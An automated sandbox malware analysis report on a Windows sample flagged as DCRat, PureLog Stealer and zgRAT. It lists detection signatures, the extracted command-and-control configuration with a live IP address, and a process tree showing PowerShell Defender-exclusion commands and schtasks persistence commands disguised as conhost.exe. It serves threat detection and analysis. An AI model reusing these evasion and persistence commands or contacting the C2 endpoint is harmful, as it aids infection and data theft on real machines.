Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3XtEci4Mmo.exe

Overview

General Information

Sample name:3XtEci4Mmo.exe
renamed because original name is a hash value
Original sample name:529b29e8bcef9cc790f7c61f40d44b39.exe
Analysis ID:1586105
MD5:529b29e8bcef9cc790f7c61f40d44b39
SHA1:094a6c81f7a116d2099790de3e7cd6449f1bb834
SHA256:a9249873d68391dcdd604b5332c1f3ee1be4303ff5ba8e83147fbab20f87de88
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3XtEci4Mmo.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\3XtEci4Mmo.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
    • powershell.exe (PID: 6100 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5932 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6860 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8076 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8164 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 9 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8208 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8264 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8292 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8312 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8332 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8388 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8460 cmdline: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8476 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8496 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8516 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • WmiPrvSE.exe (PID: 8776 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1188 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5724 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3168 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8580 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 8724 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • TezdDRgSgyeGDKRkzk.exe (PID: 8300 cmdline: "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • conhost.exe (PID: 8228 cmdline: C:\Recovery\conhost.exe MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • TezdDRgSgyeGDKRkzk.exe (PID: 8416 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • TezdDRgSgyeGDKRkzk.exe (PID: 8432 cmdline: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
    • cmd.exe (PID: 8424 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • TezdDRgSgyeGDKRkzk.exe (PID: 8496 cmdline: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
        • powershell.exe (PID: 5644 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3236 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3544 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9204 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8728 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1712 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7044 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8580 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8096 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • conhost.exe (PID: 8652 cmdline: "C:\Program Files\Google\Chrome\Application\conhost.exe" MD5: 529B29E8BCEF9CC790F7C61F40D44B39)
  • svchost.exe (PID: 6796 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
3XtEci4Mmo.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    3XtEci4Mmo.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Google\Chrome\Application\conhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: 3XtEci4Mmo.exe PID: 5444JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.3XtEci4Mmo.exe.50000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.0.3XtEci4Mmo.exe.50000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\3XtEci4Mmo.exe, ProcessId: 5444, TargetFilename: C:\Recovery\conhost.exe
                          Sigma detected: Potentially Suspicious PowerShell Child Processes
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f, CommandLine: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 180, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f, ProcessId: 8052, ProcessName: schtasks.exe
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3XtEci4Mmo.exe", ParentImage: C:\Users\user\Desktop\3XtEci4Mmo.exe, ParentProcessId: 5444, ParentProcessName: 3XtEci4Mmo.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6100, ProcessName: powershell.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\conhost.exe, CommandLine: C:\Recovery\conhost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\conhost.exe, NewProcessName: C:\Recovery\conhost.exe, OriginalFileName: C:\Recovery\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\conhost.exe, ProcessId: 8228, ProcessName: conhost.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3XtEci4Mmo.exe", ParentImage: C:\Users\user\Desktop\3XtEci4Mmo.exe, ParentProcessId: 5444, ParentProcessName: 3XtEci4Mmo.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6100, ProcessName: powershell.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3XtEci4Mmo.exe", ParentImage: C:\Users\user\Desktop\3XtEci4Mmo.exe, ParentProcessId: 5444, ParentProcessName: 3XtEci4Mmo.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6100, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6796, ProcessName: svchost.exe

                          Persistence and Installation Behavior

                          barindex
                          Sigma detected: Schedule system process
                          Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 180, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f, ProcessId: 8088, ProcessName: schtasks.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-08T18:08:35.783039+010020480951A Network Trojan was detected192.168.2.449955185.177.239.6680TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 3XtEci4Mmo.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Found malware configuration
                          Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeReversingLabs: Detection: 71%
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeReversingLabs: Detection: 71%
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeReversingLabs: Detection: 71%
                          Source: C:\Recovery\conhost.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\Desktop\BargBgFj.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\EVQZcBiW.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\FAtHPtxq.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\FizIvULx.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\HDgqkcCm.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\HTUGeMKX.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\IrkyWqxk.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\LCxGrujI.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\MgnHXjFm.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\OlTNIjCM.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\QImfPxDF.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\QNGyvuni.logReversingLabs: Detection: 20%
